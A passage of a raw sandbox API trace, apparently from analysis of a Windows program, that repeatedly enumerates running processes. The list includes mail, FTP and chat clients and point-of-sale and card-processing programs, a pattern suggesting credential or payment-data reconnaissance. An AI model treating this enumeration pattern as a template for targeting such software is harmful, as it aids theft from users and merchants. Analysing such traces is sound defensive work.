th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0217.132] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0217.134] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0217.136] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0217.138] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0217.201] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0217.204] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0217.208] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0217.211] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0217.214] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0217.217] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0217.220] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0217.223] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0217.226] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0217.228] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0217.231] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0217.234] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0217.236] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0217.244] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0217.247] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0217.249] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0217.251] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0217.253] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0217.256] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0217.259] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0217.262] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0217.264] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0217.267] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0217.269] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0217.272] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0217.275] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0217.278] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0217.285] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0217.287] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0217.290] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0217.292] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0217.294] CloseHandle (hObject=0x2138) returned 1 [0217.294] Sleep (dwMilliseconds=0x64) [0217.401] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2194 [0217.413] Process32First (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0217.414] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0217.416] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0217.418] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0217.419] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0217.421] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0217.422] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0217.424] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0217.425] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0217.429] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.431] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.432] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0217.434] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.435] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.437] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.466] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.467] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.469] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.471] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.473] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0217.474] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0217.476] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0217.478] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0217.479] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.482] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0217.484] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0217.486] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0217.487] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0217.490] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0217.491] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0217.493] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.495] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0217.496] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0217.498] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0217.499] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.540] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0217.542] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0217.544] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0217.545] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0217.547] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0217.549] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0217.550] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0217.552] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0217.554] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0217.555] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0217.557] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0217.559] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0217.560] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0217.562] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 